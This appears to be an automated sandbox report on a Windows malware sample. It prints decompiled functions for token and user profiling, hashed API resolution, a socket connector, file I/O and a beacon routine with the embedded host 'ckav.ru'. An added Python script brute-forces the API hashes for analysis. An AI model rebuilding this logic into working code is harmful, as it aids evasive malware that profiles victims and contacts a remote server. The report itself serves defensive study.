                                              					__eflags = _v8;
                                              					if(_v8 != 0) {
                                              						E00403C40(_v8); // executed               (releases the token handle)
                                              					}
                                              					__eflags = _t49;
                                              					if(_t49 != 0) {
                                              						E00402BAB(_t49);
                                              					}
                                              					_t31 = _v20;
                                              					__eflags = _t31;
                                              					if(_t31 != 0) {
                                              						E00402BAB(_t31);
                                              					}
                                              					return _t67;
                                              				}
                                              				// OpenThreadToken failed. ERROR_NO_TOKEN (0x3f0) means the thread is not
                                              				// impersonating, so fall back to the process token with TOKEN_QUERY.
                                              				_t44 = GetLastError();
                                              				if(_t44 == 0x3f0) {
                                              					E004060AC();                                   // process handle, same helper as in E0040650A
                                              					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);  // same hash as the OpenProcessToken call in E0040650A
                                              					_t3 =  &_v8; // 0x414449
                                              					// First argument shown as _t44 is register reuse in the decompiler output;
                                              					// the handle returned by E004060AC() is what is passed (OpenProcessToken(hProcess, TOKEN_QUERY, &hToken))
                                              					_t46 =  *_t45(_t44, 8, _t3);
                                              					__eflags = _t46;
                                              					if(_t46 == 0) {
                                              						goto L2;
                                              					}
                                              					goto L4;
                                              				}
                                              				L2:
                                              				return 0;
                                              			}
                                              
                                              Instruction addresses for the statements above (side column of the report): 0x004061c3 0x004061cb 0x004061cd 0x004061d0 0x004061de 0x004061e0 0x004061e5 0x004061e9 0x004061eb 0x004061ed 0x004061f2 0x0040622a 0x00406230 0x00406235 0x00406239 0x0040623b 0x00406244 0x00406249 0x00406249 0x0040624c 0x00406253 0x00406256 0x00406258 0x00406261 0x00406266 0x00406266 0x00406270 0x00406273 0x00406276 0x0040627b 0x0040627e 0x0040628c 0x0040628e 0x00406290 0x00406295 0x0040629a 0x0040629e 0x004062a0 0x004062ac 0x004062af 0x004062b7 0x004062b9 0x004062c9 0x004062e0 0x004062e2 0x004062e4 0x004062f3 0x004062f3 0x004062e4 0x004062f8 0x004062fd 0x004062a0 0x004062fe 0x00406302 0x00406307 0x0040630c 0x0040630d 0x0040630f 0x00406312 0x00406317 0x00406318 0x0040631c 0x0040631e 0x00406321 0x00406326 0x00000000 0x00406327 0x004061f4 0x004061ff 0x00406208 0x00406218 0x0040621d 0x00406224 0x00406226 0x00406228 0x00000000 0x00000000 0x00000000 0x00406228 0x00406201 0x00000000

                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                              • _wmemset.LIBCMT ref: 00406244
                                              • _wmemset.LIBCMT ref: 00406261
                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: _wmemset$ErrorInformationLastToken
                                              • String ID: IDA$IDA
                                              • API String ID: 487585393-2020647798
                                              • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                              • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                              Uniqueness

                                              Uniqueness Score: -1.00%
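Every function on this page resolves its Win32 imports through E004031E5() with a 32-bit constant as the third argument (0xea792a5f, 0xc6c3ecbb, 0xc1642df2, 0xd4449184, 0xe87a9e93, 0xecae3497, 0xc0862e2b, 0xe9fabb88). The report does not state which hash function the sample uses. The script below is an added example, not code from the report or from the sample: it tries four hash algorithms that hash-based import resolvers commonly use, over a few name encodings, and reports which (algorithm, encoding, export) pairs reproduce a constant. The export name attached to each constant is an assumption drawn from the call arguments in the decompiled code (the 0xea792a5f call takes a process handle, 0x28 and a handle pointer, which is the OpenProcessToken signature; the 0xc0862e2b call takes seven arguments starting with NULL and a SID, which is LookupAccountSidW). If nothing matches, as is likely for a custom hash, the result still rules those algorithms out, and the next step is to lift E004031E5() from the memory dump and emulate it.

```python
"""
Added example (not code from the report or from the sample): brute-force the
32-bit API-name hashes passed to the resolver E004031E5() against hash
algorithms that hash-based import resolvers commonly use.
"""
import zlib

MASK = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    return ((value >> count) | (value << (32 - count))) & MASK


def ror13_hash(name: bytes) -> int:
    """Classic shellcode hash: h = ror(h, 13) + byte, for each byte."""
    h = 0
    for b in name:
        h = (ror32(h, 13) + b) & MASK
    return h


def djb2_hash(name: bytes) -> int:
    """djb2: h = h * 33 + byte, starting from 5381."""
    h = 5381
    for b in name:
        h = (h * 33 + b) & MASK
    return h


def fnv1a32_hash(name: bytes) -> int:
    """32-bit FNV-1a: xor the byte in, then multiply by the FNV prime."""
    h = 0x811C9DC5
    for b in name:
        h = ((h ^ b) * 0x01000193) & MASK
    return h


def crc32_hash(name: bytes) -> int:
    """Plain CRC-32 (IEEE), as used by several loaders for import hashing."""
    return zlib.crc32(name) & MASK


ALGORITHMS = {
    "ror13": ror13_hash,
    "djb2": djb2_hash,
    "fnv1a32": fnv1a32_hash,
    "crc32": crc32_hash,
}

# Constants taken from the decompiled functions on this page. The export paired
# with each one is an assumption derived from the call's arguments, not a string
# recovered from the binary.
PAGE_HASHES = {
    0xEA792A5F: "OpenProcessToken",
    0xC6C3ECBB: "LookupPrivilegeValueW",
    0xC1642DF2: "AdjustTokenPrivileges",
    0xD4449184: "GetUserNameW",
    0xE87A9E93: "OpenThreadToken",
    0xECAE3497: "GetTokenInformation",
    0xC0862E2B: "LookupAccountSidW",
    0xE9FABB88: "CreateFileW",
}


def name_variants(name: str):
    """Encodings a resolver may hash: bare ASCII, NUL-terminated, upper-cased, UTF-16LE."""
    raw = name.encode("ascii")
    yield "ascii", raw
    yield "ascii+nul", raw + b"\0"
    yield "upper", raw.upper()
    yield "utf16le", name.encode("utf-16-le")


def brute_force(targets, candidates):
    """Return {target_hash: [(algorithm, encoding, export_name), ...]} for every hit."""
    hits = {}
    for algo_name, func in ALGORITHMS.items():
        for cand in candidates:
            for variant, data in name_variants(cand):
                h = func(data)
                if h in targets:
                    hits.setdefault(h, []).append((algo_name, variant, cand))
    return hits


if __name__ == "__main__":
    results = brute_force(set(PAGE_HASHES), list(PAGE_HASHES.values()))
    for h, expected in PAGE_HASHES.items():
        found = results.get(h)
        print(f"{h:#010x} (expected {expected}): "
              f"{found or 'no match among the listed algorithms'}")
```

Run it as a script to check the page's constants; extend ALGORITHMS with the routine you lift from E004031E5() once you have it, and the same loop then confirms the assumed export names. The ror13 value of "LoadLibraryA" (0xEC0E4E8E) is a convenient self-check for the rotate implementation.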

                                              C-Code - Quality: 37%
                                              			// Opens a TCP connection to host _a4 / service _a8 and returns a pointer to a
                                              			// heap-allocated SOCKET, or NULL on failure. The ws2_32 imports by ordinal are
                                              			// #23 = socket and #4 = connect. Only the first addrinfo result is tried;
                                              			// ai_next is never walked.
                                              			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;        // addrinfo* result of getaddrinfo
                                              				intOrPtr _v28;         // hints.ai_protocol
                                              				intOrPtr _v32;         // hints.ai_socktype
                                              				intOrPtr _v36;         // hints.ai_family
                                              				void _v40;             // hints.ai_flags, start of the 32-byte addrinfo hints
                                              				void* _t23;
                                              				signed int _t24;
                                              				signed int* _t25;
                                              				signed int _t30;
                                              				signed int _t31;
                                              				signed int _t33;
                                              				signed int _t41;
                                              				void* _t42;
                                              				signed int* _t43;
                                              
                                              				_v8 = _v8 & 0x00000000;
                                              				_t33 = 8;
                                              				memset( &_v40, 0, _t33 << 2);                  // zero the eight-dword hints struct
                                              				_v32 = 1;                                       // SOCK_STREAM
                                              				_t23 =  &_v40;
                                              				_v28 = 6;                                       // IPPROTO_TCP
                                              				_v36 = 2;                                       // AF_INET
                                              				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                              				if(_t23 == 0) {                                 // getaddrinfo succeeded (decompiler reuses _t23 for its return value)
                                              					_t24 = E00402B7C(4);                        // heap slot for the SOCKET
                                              					_t43 = _t24;
                                              					_t31 = _t30 | 0xffffffff;                   // INVALID_SOCKET
                                              					 *_t43 = _t31;
                                              					_t41 = _v8;
                                              					// socket(ai_family, ai_socktype, ai_protocol); the trailing _t42, _t30 are decompiler noise
                                              					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                              					 *_t43 = _t24;
                                              					if(_t24 != _t31) {
                                              						// connect(s, ai_addr, ai_addrlen)
                                              						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                              						if(_t24 == _t31) {                      // connect returned SOCKET_ERROR
                                              							E00404DE5(_t24,  *_t43);            // discards the socket (closesocket pattern)
                                              							 *_t43 = _t31;
                                              						}
                                              						__imp__freeaddrinfo(_v8);
                                              						if( *_t43 != _t31) {
                                              							_t25 = _t43;                        // connected: return the heap SOCKET slot
                                              							goto L10;
                                              						} else {
                                              							E00402BAB(_t43);
                                              							L8:
                                              							_t25 = 0;
                                              							L10:
                                              							return _t25;
                                              						}
                                              					}
                                              					E00402BAB(_t43);                            // socket() failed: free the slot
                                              					__imp__freeaddrinfo(_v8);
                                              					goto L8;
                                              				}
                                              				return 0;
                                              			}
                                              
                                              Instruction addresses for the statements above (side column of the report): 0x00404e1d 0x00404e26 0x00404e2a 0x00404e2f 0x00404e37 0x00404e3a 0x00404e45 0x00404e4f 0x00404e57 0x00404e61 0x00404e66 0x00404e68 0x00404e6c 0x00404e6e 0x00404e7a 0x00404e80 0x00404e84 0x00404e9f 0x00404ea7 0x00404eab 0x00404eb1 0x00404eb1 0x00404eb6 0x00404ebe 0x00404ecb 0x00000000 0x00404ec0 0x00404ec1 0x00404ec7 0x00404ec7 0x00404ecd 0x00000000 0x00404ece 0x00404ebe 0x00404e87 0x00404e90 0x00000000 0x00404e90 0x00000000

                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: freeaddrinfogetaddrinfosocket
                                              • String ID:
                                              • API String ID: 2479546573-0
                                              • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                              • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 74%
                                              			// Opens the file _a4 read-only. The resolver is called with module argument 0
                                              			// here, against 9 for the advapi32 exports above, and hash 0xe9fabb88 precedes
                                              			// the CreateFileW import.
                                              			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                              				struct _SECURITY_ATTRIBUTES* _v8;   // file handle
                                              				char _v12;
                                              				long _v16;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* _t16;
                                              				intOrPtr* _t25;
                                              				long* _t28;
                                              				void* _t30;
                                              				int _t32;
                                              				intOrPtr* _t33;
                                              				void* _t35;
                                              				void* _t42;
                                              				intOrPtr _t43;
                                              				long _t44;
                                              				struct _OVERLAPPED* _t46;
                                              
                                              				_t46 = 0;
                                              				_t35 = 0;
                                              				E004031E5(0, 0, 0xe9fabb88, 0, 0);   // resolves CreateFileW (kernel32)
                                              				// CreateFileW(path, GENERIC_READ (0x80000000), FILE_SHARE_READ (1), NULL, OPEN_EXISTING (3), FILE_ATTRIBUTE_NORMAL (0x80), NULL)
                                              				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                              				_t42 = _t16;
                                              				_v8 = _t42;
                                              				if(_t42 == 0xffffffff) {               // INVALID_HANDLE_VALUE
                                              					__eflags = _a12;
                                              					if(_a12 == 0) {
                                              						L10:
                                              						return _t35;                       // 0: nothing was read
                                              					}
                                              					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                              					__eflags = _t43;
                                              					if(_t43 == 0) {
                                              						goto L10;
                                              					}
                                              					_push(0);
                                              					__eflags = E00403C59(_a4, _t43);
                                              					if(__eflags != 0) {
                                              						_v8 = 0;
                                              						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                              						_push(_t43);
                                              						 *_a8 = _v8;
                                              						E00403D44();
                                              					}
                                              					E00402BAB(_t43);
                                              					return _t46;
                                              				}
                                              				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                              				_t44 =  *_t25(_t42,  &_v12);
                                              				if(_v12 != 0 || _t44 > 0x40000000) {
                                              					L8:
                                              					_t45 = _v8;
                                              					goto L9;
                                              				} else {
                                              					_t28 = _a8;
                                              					if(_t28 != 0) {
                                              						 *_t28 = _t44;
                                              					}
                                              					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                              					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                              					_t35 = _t30;
                                              					if(_t35 == 0) {
                                              						goto L8;
                                              					} else {
                                              						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                              						_t45 = _v8;
                                              						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                              						if(_t32 == 0) {
                                              							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                              							 *_t33(_t35, _t46, 0x8000);
                                              							_t35 = _t46;
                                              						}
                                              						L9:
                                              						E00403C40(_t45); // executed
                                              						goto L10;
                                              					}
                                              				}
                                              			}


                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$AllocCreateReadVirtual
                                              • String ID: .tmp
                                              • API String ID: 3585551309-2986845003
                                              • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                              • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 79%
                                              			E00413866(void* __eflags) {
                                              				short _v6;
                                              				short _v8;
                                              				short _v10;
                                              				short _v12;
                                              				short _v14;
                                              				short _v16;
                                              				short _v18;
                                              				short _v20;
                                              				short _v22;
                                              				char _v24;
                                              				short _v28;
                                              				short _v30;
                                              				short _v32;
                                              				short _v34;
                                              				short _v36;
                                              				short _v38;
                                              				short _v40;
                                              				short _v42;
                                              				short _v44;
                                              				short _v46;
                                              				char _v48;
                                              				short _v52;
                                              				short _v54;
                                              				short _v56;
                                              				short _v58;
                                              				short _v60;
                                              				short _v62;
                                              				short _v64;
                                              				short _v66;
                                              				short _v68;
                                              				short _v70;
                                              				short _v72;
                                              				short _v74;
                                              				char _v76;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* _t38;
                                              				short _t43;
                                              				short _t44;
                                              				short _t45;
                                              				short _t46;
                                              				short _t47;
                                              				short _t48;
                                              				short _t50;
                                              				short _t51;
                                              				short _t52;
                                              				short _t54;
                                              				short _t55;
                                              				intOrPtr* _t57;
                                              				intOrPtr* _t59;
                                              				intOrPtr* _t61;
                                              				void* _t63;
                                              				WCHAR* _t65;
                                              				long _t68;
                                              				void* _t75;
                                              				short _t76;
                                              				short _t78;
                                              				short _t83;
                                              				short _t84;
                                              				short _t85;
                                              
                                              				E00402C6C(_t38);
                                              				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                              				SetErrorMode(3); // executed
                                              				_t43 = 0x4f;
                                              				_v76 = _t43;
                                              				_t44 = 0x4c;
                                              				_v74 = _t44;
                                              				_t45 = 0x45;
                                              				_v72 = _t45;
                                              				_t46 = 0x41;
                                              				_v70 = _t46;
                                              				_t47 = 0x55;
                                              				_v68 = _t47;
                                              				_t48 = 0x54;
                                              				_t76 = 0x33;
                                              				_t84 = 0x32;
                                              				_t83 = 0x2e;
                                              				_t78 = 0x64;
                                              				_t85 = 0x6c;
                                              				_v66 = _t48;
                                              				_v52 = 0;
                                              				_t50 = 0x77;
                                              				_v48 = _t50;
                                              				_t51 = 0x73;
                                              				_v46 = _t51;
                                              				_t52 = 0x5f;
                                              				_v42 = _t52;
                                              				_v28 = 0;
                                              				_t54 = 0x6f;
                                              				_v24 = _t54;
                                              				_t55 = 0x65;
                                              				_v20 = _t55;
                                              				_v64 = _t76;
                                              				_v62 = _t84;
                                              				_v60 = _t83;
                                              				_v58 = _t78;
                                              				_v56 = _t85;
                                              				_v54 = _t85;
                                              				_v44 = _t84;
                                              				_v40 = _t76;
                                              				_v38 = _t84;
                                              				_v36 = _t83;
                                              				_v34 = _t78;
                                              				_v32 = _t85;
                                              				_v30 = _t85;
                                              				_v22 = _t85;
                                              				_v18 = _t76;
                                              				_v16 = _t84;
                                              				_v14 = _t83;
                                              				_v12 = _t78;
                                              				_v10 = _t85;
                                              				_v8 = _t85;
                                              				_v6 = 0;
                                              				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                              				 *_t57( &_v76);
                                              				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                              				 *_t59( &_v48);
                                              				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                              				_t81 =  &_v24;
                                              				 *_t61( &_v24); // executed
                                              				_t63 = E00414059(); // executed
                                              				if(_t63 != 0) {
                                              					_t65 = E00413D97(0);
                                              					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                              					CreateMutexW(0, 1, _t65); // executed
                                              					_t68 = GetLastError();
                                              					_t92 = _t68 - 0xb7;
                                              					if(_t68 == 0xb7) {
                                              						E00413B81(0);
                                              						_pop(_t81); // executed
                                              					}
                                              					E00413003(_t92); // executed
                                              					E00412B2E(_t92); // executed
                                              					E00412D31(_t81, _t84); // executed
                                              					E00413B3F();
                                              					E00413B81(0);
                                              					 *0x49fdd0 = 1;
                                              				}
                                              				return 0;
                                              			}


                                              APIs
                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                              • GetLastError.KERNEL32 ref: 0041399E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Error$CreateLastModeMutex
                                              • String ID:
                                              • API String ID: 3448925889-0
                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                              				long _v8;
                                              				void* _t7;
                                              				long _t10;
                                              				void* _t21;
                                              				struct _OVERLAPPED* _t24;
                                              
                                              				_t14 = __ebx;
                                              				_t24 = 0;
                                              				_v8 = 0;
                                              				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                              				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                              				_t21 = _t7;
                                              				if(_t21 != 0xffffffff) {
                                              					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                              					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                              					if(_t10 != 0xffffffff) {
                                              						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                              						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                              						_t24 =  !=  ? 1 : 0;
                                              					}
                                              					E00403C40(_t21); // executed
                                              				}
                                              				return _t24;
                                              			}


                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 3672724799-0
                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 34%
                                              			E00412D31(void* __ecx, void* __edi) {
                                              				long _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				char _v40;
                                              				void* __ebx;
                                              				intOrPtr* _t10;
                                              				void* _t11;
                                              				void* _t25;
                                              				void* _t26;
                                              				void* _t27;
                                              				void* _t35;
                                              				void* _t53;
                                              				char* _t57;
                                              				void* _t58;
                                              				void* _t61;
                                              				void* _t64;
                                              				void* _t65;
                                              				intOrPtr* _t66;
                                              				void* _t67;
                                              				void* _t68;
                                              				void* _t69;
                                              				void* _t70;
                                              				void* _t71;
                                              				void* _t72;
                                              				void* _t73;
                                              
                                              				_t53 = __ecx;
                                              				_t10 =  *0x49fde0;
                                              				_t68 = _t67 - 0x24;
                                              				 *0x49fddc = 0x927c0;
                                              				 *0x49fde4 = 0;
                                              				_t75 = _t10;
                                              				if(_t10 != 0) {
                                              					L16:
                                              					_push(1);
                                              					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                              					_t61 = _t11;
                                              					_t68 = _t68 + 0xc;
                                              					if(_t61 != 0) {
                                              						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                              						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                              					}
                                              					L004067C4(0xea60); // executed
                                              					_pop(_t53);
                                              				} else {
                                              					_push(__edi);
                                              					 *0x49fde0 = E004056BF(0x2bc);
                                              					E00413DB7(_t53, _t75,  &_v40);
                                              					_t57 =  &_v24;
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					E004058D4( *0x49fde0, 0x12);
                                              					E004058D4( *0x49fde0, 0x28);
                                              					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                              					_t69 = _t68 + 0x28;
                                              					_t64 = E0040632F();
                                              					_push(0);
                                              					_push(1);
                                              					if(_t64 == 0) {
                                              						_push(0);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						_t70 = _t69 + 0x10;
                                              					} else {
                                              						_push(_t64);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						E00402BAB(_t64);
                                              						_t70 = _t69 + 0x14;
                                              					}
                                              					_t58 = E00406130(_t57);
                                              					_push(0);
                                              					_push(1);
                                              					_t77 = _t64;
                                              					if(_t64 == 0) {
                                              						_push(0);
                                              						_push( *0x49fde0);
                                              						_t25 = E00405872();
                                              						_t71 = _t70 + 0x10; // executed
                                              					} else {
                                              						_push(_t58);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						_t25 = E00402BAB(_t58);
                                              						_t71 = _t70 + 0x14;
                                              					}
                                              					_t26 = E004061C3(_t25, 0, _t77); // executed
                                              					_t65 = _t26;
                                              					_push(0);
                                              					_push(1);
                                              					if(_t65 == 0) {
                                              						_push(0);
                                              						_push( *0x49fde0);
                                              						_t27 = E00405872();
                                              						_t72 = _t71 + 0x10;
                                              					} else {
                                              						_push(_t65);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						_t27 = E00402BAB(_t65);
                                              						_t72 = _t71 + 0x14;
                                              					}
                                              					_t66 = E00406189(_t27);
                                              					_t79 = _t66;
                                              					if(_t66 == 0) {
                                              						E00405781( *0x49fde0, 0);
                                              						E00405781( *0x49fde0, 0);
                                              						_t73 = _t72 + 0x10;
                                              					} else {
                                              						E00405781( *0x49fde0,  *_t66);
                                              						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                              						E00402BAB(_t66);
                                              						_t73 = _t72 + 0x14;
                                              					}
                                              					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                                              					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                                              					_t35 = E0040642C(_t79); // executed
                                              					E004058D4( *0x49fde0, _t35);
                                              					E004058D4( *0x49fde0, _v24);
                                              					E004058D4( *0x49fde0, _v20);
                                              					E004058D4( *0x49fde0, _v16);
                                              					E004058D4( *0x49fde0, _v12);
                                              					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                              					_t68 = _t73 + 0x48;
                                              				}
                                              				_t80 =  *0x49fde4;
                                              				if( *0x49fde4 == 0) {
                                              					_t10 =  *0x49fde0;
                                              					goto L16;
                                              				}
                                              				return E00405695(_t53,  *0x49fde0);
                                              			}

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                              • String ID: ckav.ru
                                              • API String ID: 2915393847-2696028687
                                              • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                              • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0040632F() {
                                              				char _v8;
                                              				void* _t4;
                                              				void* _t7;
                                              				void* _t16;
                                              
                                              				_t16 = E00402B7C(0x208);
                                              				if(_t16 == 0) {
                                              					L4:
                                              					_t4 = 0;
                                              				} else {
                                              					E0040338C(_t16, 0, 0x104);
                                              					_t1 =  &_v8; // 0x4143e8
                                              					_v8 = 0x208;
                                              					_t7 = E00406069(_t16, _t1); // executed
                                              					if(_t7 == 0) {
                                              						E00402BAB(_t16);
                                              						goto L4;
                                              					} else {
                                              						_t4 = _t16;
                                              					}
                                              				}
                                              				return _t4;
                                              			}

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
